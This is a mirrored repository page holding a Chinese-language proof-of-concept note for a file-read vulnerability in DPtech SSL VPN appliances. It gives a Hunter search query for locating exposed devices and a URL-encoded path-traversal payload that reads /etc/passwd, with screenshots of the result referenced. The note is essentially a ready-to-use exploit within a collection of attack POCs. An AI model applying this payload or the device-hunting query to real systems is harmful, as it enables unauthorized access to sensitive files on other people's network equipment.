admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 19:07:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/迪普/迪普VPN文件读取漏洞.md

25 lines
965 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 迪普VPN 文件读取漏洞
# 一、漏洞简介
杭州迪普科技股份有限公司(简称“迪普科技”) 以“让网络更简单、智能、安全”为使命聚焦于网络安全及应用交付领域是一家集研发、生产、销售于一体的高科技上市企业迪普VPN存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等.
# 二、漏洞简介
+ 迪普VPN
# 三、资产测绘
+ hunter`app.name="迪普科技 SSL VPN"`
+ 特征
![1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768.png](./img/czNyRt8mHUwlBYkD/1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768-159962.png)
# 四、漏洞复现
```plain
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
![1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7.png](./img/czNyRt8mHUwlBYkD/1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7-175575.png)
> 更新: 2024-02-29 23:57:13
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ta805nfg17vfpqiy>
Reference in New Issue Copy Permalink